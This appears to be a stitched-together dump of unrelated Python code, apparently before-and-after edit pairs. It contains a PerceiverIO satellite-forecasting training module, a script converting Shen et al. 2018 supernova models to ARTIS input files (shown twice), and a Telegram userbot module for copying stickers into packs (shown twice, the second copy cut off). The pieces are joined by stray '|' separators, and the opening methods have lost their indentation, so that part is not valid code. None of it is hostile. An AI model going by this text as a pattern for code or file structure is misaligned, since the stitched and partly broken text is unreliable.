def _train_or_validate_step(self, batch, batch_idx, is_training: bool = True):
x, y = batch
batch_size = y.size(0)
# For each future timestep:
predictions = []
query = self.construct_query(x)
if self.visualize:
vis_x = x.cpu()
x = self.encode_inputs(x)
for i in range(self.forecast_steps):
x["forecast_time"] = self.add_timestep(batch_size, i).type_as(y)
# x_i = self.ct(x["timeseries"], fstep=i)
y_hat = self(x, query=query)
y_hat = rearrange(y_hat, "b h (w c) -> b c h w", c=self.output_channels)
predictions.append(y_hat)
y_hat = torch.stack(predictions, dim=1) # Stack along the timestep dimension
if self.postprocessor is not None:
y_hat = self.postprocessor(y_hat)
if self.visualize:
# Only visualize the second batch of train/val
if batch_idx == 1:
self.visualize_step(
vis_x, y, y_hat, batch_idx, step=f"{'train' if is_training else 'val'}"
)
loss = self.criterion(y, y_hat)
self.log_dict({f"{'train' if is_training else 'val'}/loss": loss})
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"{'train' if is_training else 'val'}/frame_{f}_loss"] = frame_loss
self.log_dict(frame_loss_dict)
return loss
def configure_optimizers(self):
# They use LAMB as the optimizer
optimizer = optim.Lamb(self.parameters(), lr=self.lr, betas=(0.9, 0.999))
scheduler = LinearWarmupCosineAnnealingLR(optimizer, warmup_epochs=10, max_epochs=100)
lr_dict = {
# REQUIRED: The scheduler instance
"scheduler": scheduler,
# The unit of the scheduler's step size, could also be 'step'.
# 'epoch' updates the scheduler on epoch end whereas 'step'
# updates it after a optimizer update.
"interval": "step",
# How many epochs/steps should pass between calls to
# `scheduler.step()`. 1 corresponds to updating the learning
# rate after every epoch/step.
"frequency": 1,
# If using the `LearningRateMonitor` callback to monitor the
# learning rate progress, this keyword can be used to specify
# a custom logged name
"name": None,
}
return {"optimizer": optimizer, "lr_scheduler": lr_dict}
def construct_query(self, x):
    """Build the Perceiver decoder query from the final frame of the input.

    Returns the preprocessed input's last timestep, first channel slice.
    """
    # key, value: B x N x K; query: B x M x K
    # Attention maps -> B x N x M
    # Output -> B x M x K
    # So want query to be B X (T*H*W) X C to reshape to B x T x C x H x W
    if self.preprocessor is not None:
        x = self.preprocessor(x)
    # assumes x is (batch, time, channel, height, width) — TODO confirm
    y_query = x[:, -1, 0, :, :]  # Only want sat channels, the output
    # y_query = torch.permute(y_query, (0, 2, 3, 1)) # Channel Last
    # Need to reshape to 3 dimensions, TxHxW or HxWxC
    # y_query = rearrange(y_query, "b h w d -> b (h w) d")
    logger.debug(f"Query Shape: {y_query.shape}")
    return y_query
def forward(self, x, mask=None, query=None):
    """Delegate to the wrapped model; note the kwarg rename ``query`` -> ``queries``."""
    return self.model.forward(x, mask=mask, queries=query)
class MultiPerceiverSat(torch.nn.Module):
    def __init__(
        self,
        use_input_as_query: bool = False,
        use_learnable_query: bool = False,
        **kwargs,
    ):
        """
        PerceiverIO made to work more specifically with timeseries images

        Not a recurrent model, so like MetNet somewhat, can optionally give a one-hot encoded vector for the future
        timestep

        Args:
            use_input_as_query: currently unused; stored for interface compatibility
            use_learnable_query: if True, learn the decoder query from random noise
            **kwargs: forwarded to MultiPerceiver; ``query_dim`` (default 32) and
                ``output_shape`` (default [24, 32, 32]) are also read here
        """
        super(MultiPerceiverSat, self).__init__()
        self.multi_perceiver = MultiPerceiver(**kwargs)
        # BUG FIX: flags and query dimensions must be assigned BEFORE building
        # the learnable-query head. The original read self.query_dim before it
        # existed and never stored use_learnable_query at all, so __init__
        # (with use_learnable_query=True) and forward() raised AttributeError.
        self.use_input_as_query = use_input_as_query
        self.use_learnable_query = use_learnable_query
        self.query_dim = kwargs.get("query_dim", 32)
        self.query_future_size = prod(kwargs.get("output_shape", [24, 32, 32]))
        if use_learnable_query:
            # Like GAN sorta, random input, learn important parts in linear layer T*H*W shape,
            # need to add Fourier features too though
            self.learnable_query = torch.nn.Linear(self.query_dim, self.query_dim)
            self.distribution = uniform.Uniform(low=torch.Tensor([0.0]), high=torch.Tensor([1.0]))

    def forward(self, multi_modality_data: Dict[str, torch.Tensor], mask=None, queries=None):
        """Encode all modalities, optionally build a learnable query, then decode with the Perceiver."""
        data = self.multi_perceiver.forward(multi_modality_data)
        # Create learnable query here, need to add fourier features as well
        if self.use_learnable_query:
            # Create learnable query, also adds somewhat ensemble on multiple forward passes
            # Middle is the shape of the future timesteps and such
            z = self.distribution.sample(
                (data.shape[0], self.query_future_size, self.query_dim)
            ).type_as(data)
            queries = self.learnable_query(z)
        # Add Fourier Features now to the query
        perceiver_output = self.multi_perceiver.perceiver.forward(data, mask, queries)
        logger.debug(f"Perceiver Finished Output: {perceiver_output.size()}")
        return perceiver_output
|
#!/usr/bin/env python3
import argparse
import math
import os.path
import numpy as np
import pandas as pd
from astropy import units as u
import artistools as at
def addargs(parser):
    """Register this converter's command-line arguments on *parser*."""
    parser.add_argument(
        '-inputpath', '-i', default='1.00_5050.dat',
        help='Path of input file')
    parser.add_argument(
        '-outputpath', '-o', default='.',
        help='Path for output files')
def main(args=None, argsraw=None, **kwargs) -> None:
    """Convert a Shen et al. 2018 detonation model to ARTIS format.

    Reads the input table (enclosed mass, velocity and isotopic mass
    fractions per shell), derives each cell's density at the model epoch,
    and writes ARTIS 'model.txt' and 'abundances.txt' to args.outputpath.
    """
    if args is None:
        # Build the CLI parser only when not called programmatically.
        parser = argparse.ArgumentParser(
            formatter_class=argparse.ArgumentDefaultsHelpFormatter,
            description='Convert Shen et al. 2018 models to ARTIS format.')
        addargs(parser)
        parser.set_defaults(**kwargs)
        args = parser.parse_args(argsraw)

    # Read the header row to discover which isotope columns are present.
    with open(args.inputpath) as infile:
        columns = infile.readline().split()

    # Map each isotope column (e.g. 'ni56') to its element's atomic number
    # and group the isotopes belonging to each element.
    atomicnumberofspecies = {}
    isotopesofelem = {}
    for species in columns[5:]:
        atomic_number = at.get_atomic_number(species.rstrip('0123456789'))
        atomicnumberofspecies[species] = atomic_number
        isotopesofelem.setdefault(atomic_number, list()).append(species)

    datain = pd.read_csv(args.inputpath, delim_whitespace=True, skiprows=0, header=[0]).dropna()

    dfmodel = pd.DataFrame(
        columns=[
            'inputcellid', 'velocity_outer', 'logrho', 'X_Fegroup', 'X_Ni56', 'X_Co56', 'X_Fe52', 'X_Cr48',
            'X_Ni57', 'X_Co57'])
    dfmodel.index.name = 'cellid'
    # One mass-fraction column per element from H (Z=1) to Zn (Z=30).
    dfabundances = pd.DataFrame(columns=['inputcellid', *['X_' + at.elsymbols[x] for x in range(1, 31)]])
    dfabundances.index.name = 'cellid'

    t_model_init_seconds = 10.
    t_model_init_days = t_model_init_seconds / 24 / 60 / 60

    v_inner = 0.  # velocity at inner boundary of cell
    m_enc_inner = 0.  # mass enclosed at inner boundary
    tot_ni56mass = 0.
    for cellid, shell in datain.iterrows():
        m_enc_outer = float(shell['m']) * u.solMass.to('g')  # convert Solar masses to grams
        v_outer = float(shell['v']) * 1e-5  # convert cm/s to km/s
        m_shell_grams = (m_enc_outer - m_enc_inner)
        # Shell radii from homologous expansion: r = v * t.
        r_outer = v_outer * 1e5 * t_model_init_seconds
        r_inner = v_inner * 1e5 * t_model_init_seconds
        vol_shell = 4. / 3. * math.pi * (r_outer ** 3 - r_inner ** 3)
        rho = m_shell_grams / vol_shell
        tot_ni56mass += m_shell_grams * shell.ni56

        # Sum each element's isotopes into elemental mass fractions;
        # elements Fe (Z=26) and above count towards the Fe-group fraction.
        abundances = [0. for _ in range(31)]
        X_fegroup = 0.
        for atomic_number in range(1, 31):
            abundances[atomic_number] = sum([float(shell[species]) for species in isotopesofelem[atomic_number]])
            if atomic_number >= 26:
                X_fegroup += abundances[atomic_number]

        radioabundances = [X_fegroup, shell.ni56, shell.co56, shell.fe52, shell.cr48, shell.ni57, shell.co57]
        dfmodel.loc[cellid] = [cellid, v_outer, math.log10(rho), *radioabundances]
        dfabundances.loc[cellid] = [cellid, *abundances[1:31]]
        v_inner = v_outer
        m_enc_inner = m_enc_outer

    # BUG FIX: the original nested single quotes inside single-quoted
    # f-strings (f'...{u.solMass.to('g')}...'), which is a SyntaxError on
    # Python < 3.12; use double quotes inside the replacement field.
    print(f'M_tot = {m_enc_outer / u.solMass.to("g"):.3f} solMass')
    print(f'M_Ni56 = {tot_ni56mass / u.solMass.to("g"):.3f} solMass')

    at.save_modeldata(dfmodel, t_model_init_days, os.path.join(args.outputpath, 'model.txt'))
    at.inputmodel.save_initialabundances(dfabundances, os.path.join(args.outputpath, 'abundances.txt'))
# Allow running this converter directly from the command line.
if __name__ == "__main__":
    main()
| #!/usr/bin/env python3
import argparse
import math
import os.path
import numpy as np
import pandas as pd
from astropy import units as u
import artistools as at
def addargs(parser):
    """Register this converter's command-line arguments on *parser*."""
    parser.add_argument(
        '-inputpath', '-i', default='1.00_5050.dat',
        help='Path of input file')
    parser.add_argument(
        '-outputpath', '-o', default='.',
        help='Path for output files')
def main(args=None, argsraw=None, **kwargs) -> None:
    """Convert a Shen et al. 2018 detonation model to ARTIS format.

    Reads the input table (enclosed mass, velocity and isotopic mass
    fractions per shell), derives each cell's density at the model epoch,
    and writes ARTIS 'model.txt' and 'abundances.txt' to args.outputpath.
    """
    if args is None:
        # Build the CLI parser only when not called programmatically.
        parser = argparse.ArgumentParser(
            formatter_class=argparse.ArgumentDefaultsHelpFormatter,
            description='Convert Shen et al. 2018 models to ARTIS format.')
        addargs(parser)
        parser.set_defaults(**kwargs)
        args = parser.parse_args(argsraw)

    # Read the header row to discover which isotope columns are present.
    with open(args.inputpath) as infile:
        columns = infile.readline().split()

    # Map each isotope column (e.g. 'ni56') to its element's atomic number
    # and group the isotopes belonging to each element.
    atomicnumberofspecies = {}
    isotopesofelem = {}
    for species in columns[5:]:
        atomic_number = at.get_atomic_number(species.rstrip('0123456789'))
        atomicnumberofspecies[species] = atomic_number
        isotopesofelem.setdefault(atomic_number, list()).append(species)

    datain = pd.read_csv(args.inputpath, delim_whitespace=True, skiprows=0, header=[0]).dropna()

    dfmodel = pd.DataFrame(
        columns=[
            'inputcellid', 'velocity_outer', 'logrho', 'X_Fegroup', 'X_Ni56', 'X_Co56', 'X_Fe52', 'X_Cr48',
            'X_Ni57', 'X_Co57'])
    dfmodel.index.name = 'cellid'
    # One mass-fraction column per element from H (Z=1) to Zn (Z=30).
    dfabundances = pd.DataFrame(columns=['inputcellid', *['X_' + at.elsymbols[x] for x in range(1, 31)]])
    dfabundances.index.name = 'cellid'

    t_model_init_seconds = 10.
    t_model_init_days = t_model_init_seconds / 24 / 60 / 60

    v_inner = 0.  # velocity at inner boundary of cell
    m_enc_inner = 0.  # mass enclosed at inner boundary
    tot_ni56mass = 0.
    for cellid, shell in datain.iterrows():
        m_enc_outer = float(shell['m']) * u.solMass.to('g')  # convert Solar masses to grams
        v_outer = float(shell['v']) * 1e-5  # convert cm/s to km/s
        m_shell_grams = (m_enc_outer - m_enc_inner)
        # Shell radii from homologous expansion: r = v * t.
        r_outer = v_outer * 1e5 * t_model_init_seconds
        r_inner = v_inner * 1e5 * t_model_init_seconds
        vol_shell = 4. / 3. * math.pi * (r_outer ** 3 - r_inner ** 3)
        rho = m_shell_grams / vol_shell
        tot_ni56mass += m_shell_grams * shell.ni56

        # Sum each element's isotopes into elemental mass fractions;
        # elements Fe (Z=26) and above count towards the Fe-group fraction.
        abundances = [0. for _ in range(31)]
        X_fegroup = 0.
        for atomic_number in range(1, 31):
            abundances[atomic_number] = sum([float(shell[species]) for species in isotopesofelem[atomic_number]])
            if atomic_number >= 26:
                X_fegroup += abundances[atomic_number]

        radioabundances = [X_fegroup, shell.ni56, shell.co56, shell.fe52, shell.cr48, shell.ni57, shell.co57]
        dfmodel.loc[cellid] = [cellid, v_outer, math.log10(rho), *radioabundances]
        dfabundances.loc[cellid] = [cellid, *abundances[1:31]]
        v_inner = v_outer
        m_enc_inner = m_enc_outer

    # NOTE(review): these reads of m_enc_outer rely on the loop having run at
    # least once — an empty input table would raise NameError here.
    print(f'M_tot = {m_enc_outer / u.solMass.to("g"):.3f} solMass')
    print(f'M_Ni56 = {tot_ni56mass / u.solMass.to("g"):.3f} solMass')

    at.save_modeldata(dfmodel, t_model_init_days, os.path.join(args.outputpath, 'model.txt'))
    at.inputmodel.save_initialabundances(dfabundances, os.path.join(args.outputpath, 'abundances.txt'))
# Allow running this converter directly from the command line.
if __name__ == "__main__":
    main()
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.events import register
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
# Playful "stealing the sticker" status messages (Indonesian); one is
# chosen at random while a kang is in progress.
KANGING_STR = [
    "Eh... Koq bagus... aku curry ahhh :3",
    "Aku curry ya kakak :)",
    "Curry Sticker dulu yee kan",
    "ehh, mantep nih.....aku ambil ya kaga",
    "Bagus eaaaa....\nAmbil ahh....",
    "Ini Sticker aku ambil yaa\nDUARR!",
    "leh ugha ni Sticker\nCurry ahh~",
    "Pim Pim Pom!!!\nni Sticker punya aing sekarang hehe",
    "Bentar boss, ane curry dulu",
    "Ihh, bagus nih\nCurry ahh~",
    "Curry lagi yee kan.....",
    "CURRY TROSS!!!",
    "Bolehkah saya curry ni sticker\nau ah curry aja hehe",
    "Curry Sticker ahh.....",
    "Curry dolo boss",
    "Swiper jangan mencurry hh",
]
@register(outgoing=True, pattern="^\.curry")
async def kang(args):
    """ For .kang command, kangs stickers or creates new ones. """
    # Copies ("kangs") a replied sticker/photo into one of the user's own
    # packs by scripting a conversation with Telegram's @Stickers bot.
    user = await bot.get_me()
    if not user.username:
        # No public username: fall back to the first name for pack naming.
        user.username = user.first_name
    message = await args.get_reply_message()
    photo = None          # downloaded image buffer (or sentinel 1 for animated)
    emojibypass = False   # True once an emoji was read from the source sticker
    is_anim = False       # True for animated (.tgs) stickers
    emoji = None
    if message and message.media:
        if isinstance(message.media, MessageMediaPhoto):
            # Plain photo: download into an in-memory buffer.
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            photo = await bot.download_media(message.photo, photo)
        elif "image" in message.media.document.mime_type.split('/'):
            # Static sticker / image document.
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            await bot.download_file(message.media.document, photo)
            if (DocumentAttributeFilename(file_name='sticker.webp') in
                    message.media.document.attributes):
                # Reuse the emoji already attached to the source sticker.
                emoji = message.media.document.attributes[1].alt
                if emoji != '':
                    emojibypass = True
        elif "tgsticker" in message.media.document.mime_type:
            # Animated sticker: must be sent to @Stickers as a .tgs file.
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            await bot.download_file(message.media.document,
                                    'AnimatedSticker.tgs')
            attributes = message.media.document.attributes
            for attribute in attributes:
                if isinstance(attribute, DocumentAttributeSticker):
                    emoji = attribute.alt
                    emojibypass = True
            is_anim = True
            photo = 1
        else:
            await args.edit("`Unsupported File!`")
            return
    else:
        await args.edit("`I can't kang that...`")
        return
    if photo:
        # Optional command arguments: ".curry [emoji] [pack-number]".
        splat = args.text.split()
        if not emojibypass:
            emoji = "🤔"
        pack = 1
        if len(splat) == 3:
            pack = splat[2]  # User sent both
            emoji = splat[1]
        elif len(splat) == 2:
            if splat[1].isnumeric():
                # User wants to push into different pack, but is okay with
                # thonk as emote.
                pack = int(splat[1])
            else:
                # User sent just custom emote, wants to push to default
                # pack
                emoji = splat[1]
        packname = f"a{user.id}_by_{user.username}_{pack}"
        packnick = f"@{user.username}'s kang pack Vol.{pack}"
        cmd = '/newpack'
        file = io.BytesIO()
        if not is_anim:
            # Static stickers are resized to 512px and re-encoded as PNG.
            image = await resize_photo(photo)
            file.name = "sticker.png"
            image.save(file, "PNG")
        else:
            packname += "_anim"
            packnick += " (Animated)"
            cmd = '/newanimated'
        # Probe the public pack page to learn whether the pack exists yet.
        response = urllib.request.urlopen(
            urllib.request.Request(f'http://t.me/addstickers/{packname}'))
        htmlstr = response.read().decode("utf8").split('\n')
        if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
            # Pack already exists: append the sticker to it.
            async with bot.conversation('Stickers') as conv:
                await conv.send_message('/addsticker')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packname)
                x = await conv.get_response()
                # "120" in the reply means the pack hit its sticker limit;
                # roll over to the next volume until one has space.
                while "120" in x.text:
                    pack += 1
                    packname = f"a{user.id}_by_{user.username}_{pack}"
                    packnick = f"@{user.username}'s kang pack Vol.{pack}"
                    await args.edit("`Switching to Pack " + str(pack) +
                                    " due to insufficient space`")
                    await conv.send_message(packname)
                    x = await conv.get_response()
                    if x.text == "Invalid pack selected.":
                        # Next volume does not exist yet: create it now.
                        await conv.send_message(cmd)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message(packnick)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        if is_anim:
                            await conv.send_file('AnimatedSticker.tgs')
                            remove('AnimatedSticker.tgs')
                        else:
                            file.seek(0)
                            await conv.send_file(file, force_document=True)
                        await conv.get_response()
                        await conv.send_message(emoji)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message("/publish")
                        if is_anim:
                            await conv.get_response()
                            await conv.send_message(f"<{packnick}>")
                        # Ensure user doesn't get spamming notifications
                        await conv.get_response()
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message("/skip")
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message(packname)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await args.edit(f"`Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname})",
                                        parse_mode='md')
                        return
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "Sorry, the file type is invalid." in rsp.text:
                    await args.edit(
                        "`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
                    )
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message('/done')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        else:
            # Pack does not exist yet: create a brand new one.
            await args.edit("`Brewing a new Pack...`")
            async with bot.conversation('Stickers') as conv:
                await conv.send_message(cmd)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packnick)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "Sorry, the file type is invalid." in rsp.text:
                    await args.edit(
                        "`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
                    )
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message("/publish")
                if is_anim:
                    await conv.get_response()
                    await conv.send_message(f"<{packnick}>")
                # Ensure user doesn't get spamming notifications
                await conv.get_response()
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message("/skip")
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message(packname)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await args.edit(f"`Thanks Stikernya Bro hehe!`\
\n[Klik Disini!](t.me/addstickers/{packname}) Untuk Melihat Stiker Saya😄",
                                parse_mode='md')
async def resize_photo(photo):
    """Resize *photo* to fit Telegram's 512x512 sticker bound, preserving aspect ratio.

    Small images are upscaled so the larger side becomes 512; larger
    images are downscaled in place with ``Image.thumbnail``.
    """
    image = Image.open(photo)
    maxsize = (512, 512)
    # BUG FIX: the original condition was `(image.width and image.height) < 512`,
    # which short-circuits to `image.height < 512` whenever width is non-zero,
    # so wide-but-short images were wrongly upscaled. Test both dimensions.
    if image.width < 512 and image.height < 512:
        size1 = image.width
        size2 = image.height
        if image.width > image.height:
            # Landscape: pin the width to 512 and scale the height.
            scale = 512 / size1
            size1new = 512
            size2new = size2 * scale
        else:
            # Portrait/square: pin the height to 512 and scale the width.
            scale = 512 / size2
            size1new = size1 * scale
            size2new = 512
        size1new = math.floor(size1new)
        size2new = math.floor(size2new)
        sizenew = (size1new, size2new)
        image = image.resize(sizenew)
    else:
        image.thumbnail(maxsize)
    return image
@register(outgoing=True, pattern="^\.stkrinfo$")
async def get_pack_info(event):
    """Reply-command .stkrinfo: show details of the replied sticker's pack."""
    if not event.is_reply:
        await event.edit("`I can't fetch info from nothing, can I ?!`")
        return
    rep_msg = await event.get_reply_message()
    if not rep_msg.document:
        await event.edit("`Reply to a sticker to get the pack details`")
        return
    try:
        # Sticker metadata is expected in the document's second attribute.
        stickerset_attr = rep_msg.document.attributes[1]
        await event.edit(
            "`Fetching details of the sticker pack, please wait..`")
    except BaseException:
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    if not isinstance(stickerset_attr, DocumentAttributeSticker):
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    # Fetch the full sticker set from Telegram by id + access hash.
    get_stickerset = await bot(
        GetStickerSetRequest(
            InputStickerSetID(
                id=stickerset_attr.stickerset.id,
                access_hash=stickerset_attr.stickerset.access_hash)))
    pack_emojis = []
    for document_sticker in get_stickerset.packs:
        if document_sticker.emoticon not in pack_emojis:
            pack_emojis.append(document_sticker.emoticon)
    # BUG FIX: the original nested double quotes inside a double-quoted
    # f-string (f"...{" ".join(...)}"), a SyntaxError on Python < 3.12;
    # use single quotes inside the replacement field instead.
    OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
             f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
             f"**Official:** `{get_stickerset.set.official}`\n" \
             f"**Archived:** `{get_stickerset.set.archived}`\n" \
             f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
             f"**Emojis In Pack:**\n{' '.join(pack_emojis)}"
    await event.edit(OUTPUT)
@register(outgoing=True, pattern="^\.get$")
async def sticker_to_png(sticker):
    """Reply-command .get: re-send the replied sticker as a PNG document."""
    if not sticker.is_reply:
        await sticker.edit("`NULL information to fetch...`")
        return False
    img = await sticker.get_reply_message()
    if not img.document:
        await sticker.edit("`Reply to a sticker...`")
        return False
    try:
        # Probe the second document attribute; missing means not a sticker.
        img.document.attributes[1]
    except Exception:
        await sticker.edit("`This is not a sticker...`")
        return
    with io.BytesIO() as image:
        # Download the sticker into memory and re-upload it as a file.
        await sticker.client.download_media(img, image)
        image.name = 'sticker.png'
        image.seek(0)
        try:
            await img.reply(file=image, force_document=True)
        except Exception:
            await sticker.edit("`Err, can't send file...`")
        else:
            # Success: remove the triggering command message.
            await sticker.delete()
    return
# Register this module's help text under the "stickers" key.
# NOTE(review): the usage text still says "Reply .kang" while the registered
# command pattern is ".curry" — confirm which command name is intended.
CMD_HELP.update({
    "stickers":
    ">`.curry [emoji('s)]?`"
    "\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack "
    "\nor specify the emoji you want to."
    "\n\n>`.curry (emoji['s]]?` [number]?"
    "\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji "
    "or choose the emoji you want to."
    "\n\n>`.stkrinfo`"
    "\nUsage: Gets info about the sticker pack."
    "\n\n>`.get`"
    "\nUsage: reply to a sticker to get 'PNG' file of sticker."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.events import register
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
# Playful "stealing the sticker" status messages (Indonesian); one is
# chosen at random while a kang is in progress.
KANGING_STR = [
    "Eh... Koq bagus... aku curry ahhh :3",
    "Aku curry ya kakak :)",
    "Curry Sticker dulu yee kan",
    "ehh, mantep nih.....aku ambil ya kaga",
    "Bagus eaaaa....\nAmbil ahh....",
    "Ini Sticker aku ambil yaa\nDUARR!",
    "leh ugha ni Sticker\nCurry ahh~",
    "Pim Pim Pom!!!\nni Sticker punya aing sekarang hehe",
    "Bentar boss, ane curry dulu",
    "Ihh, bagus nih\nCurry ahh~",
    "Curry lagi yee kan.....",
    "CURRY TROSS!!!",
    "Bolehkah saya curry ni sticker\nau ah curry aja hehe",
    "Curry Sticker ahh.....",
    "Curry dolo boss",
    "Swiper jangan mencurry hh",
]
@register(outgoing=True, pattern="^\.curry")
async def kang(args):
    """ For .kang command, kangs stickers or creates new ones. """
    # Copies ("kangs") a replied sticker/photo into one of the user's own
    # packs by scripting a conversation with Telegram's @Stickers bot.
    user = await bot.get_me()
    if not user.username:
        # No public username: fall back to the first name for pack naming.
        user.username = user.first_name
    message = await args.get_reply_message()
    photo = None          # downloaded image buffer (or sentinel 1 for animated)
    emojibypass = False   # True once an emoji was read from the source sticker
    is_anim = False       # True for animated (.tgs) stickers
    emoji = None
    if message and message.media:
        if isinstance(message.media, MessageMediaPhoto):
            # Plain photo: download into an in-memory buffer.
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            photo = await bot.download_media(message.photo, photo)
        elif "image" in message.media.document.mime_type.split('/'):
            # Static sticker / image document.
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            await bot.download_file(message.media.document, photo)
            if (DocumentAttributeFilename(file_name='sticker.webp') in
                    message.media.document.attributes):
                # Reuse the emoji already attached to the source sticker.
                emoji = message.media.document.attributes[1].alt
                if emoji != '':
                    emojibypass = True
        elif "tgsticker" in message.media.document.mime_type:
            # Animated sticker: must be sent to @Stickers as a .tgs file.
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            await bot.download_file(message.media.document,
                                    'AnimatedSticker.tgs')
            attributes = message.media.document.attributes
            for attribute in attributes:
                if isinstance(attribute, DocumentAttributeSticker):
                    emoji = attribute.alt
                    emojibypass = True
            is_anim = True
            photo = 1
        else:
            await args.edit("`Unsupported File!`")
            return
    else:
        await args.edit("`I can't kang that...`")
        return
    if photo:
        # Optional command arguments: ".curry [emoji] [pack-number]".
        splat = args.text.split()
        if not emojibypass:
            emoji = "🤔"
        pack = 1
        if len(splat) == 3:
            pack = splat[2]  # User sent both
            emoji = splat[1]
        elif len(splat) == 2:
            if splat[1].isnumeric():
                # User wants to push into different pack, but is okay with
                # thonk as emote.
                pack = int(splat[1])
            else:
                # User sent just custom emote, wants to push to default
                # pack
                emoji = splat[1]
        packname = f"a{user.id}_by_{user.username}_{pack}"
        packnick = f"@{user.username}'s kang pack Vol.{pack}"
        cmd = '/newpack'
        file = io.BytesIO()
        if not is_anim:
            # Static stickers are resized to 512px and re-encoded as PNG.
            image = await resize_photo(photo)
            file.name = "sticker.png"
            image.save(file, "PNG")
        else:
            packname += "_anim"
            packnick += " (Animated)"
            cmd = '/newanimated'
        # Probe the public pack page to learn whether the pack exists yet.
        response = urllib.request.urlopen(
            urllib.request.Request(f'http://t.me/addstickers/{packname}'))
        htmlstr = response.read().decode("utf8").split('\n')
        if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
            # Pack already exists: append the sticker to it.
            async with bot.conversation('Stickers') as conv:
                await conv.send_message('/addsticker')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packname)
                x = await conv.get_response()
                # "120" in the reply means the pack hit its sticker limit;
                # roll over to the next volume until one has space.
                while "120" in x.text:
                    pack += 1
                    packname = f"a{user.id}_by_{user.username}_{pack}"
                    packnick = f"@{user.username}'s kang pack Vol.{pack}"
                    await args.edit("`Switching to Pack " + str(pack) +
                                    " due to insufficient space`")
                    await conv.send_message(packname)
                    x = await conv.get_response()
                    if x.text == "Invalid pack selected.":
                        # Next volume does not exist yet: create it now.
                        await conv.send_message(cmd)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message(packnick)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        if is_anim:
                            await conv.send_file('AnimatedSticker.tgs')
                            remove('AnimatedSticker.tgs')
                        else:
                            file.seek(0)
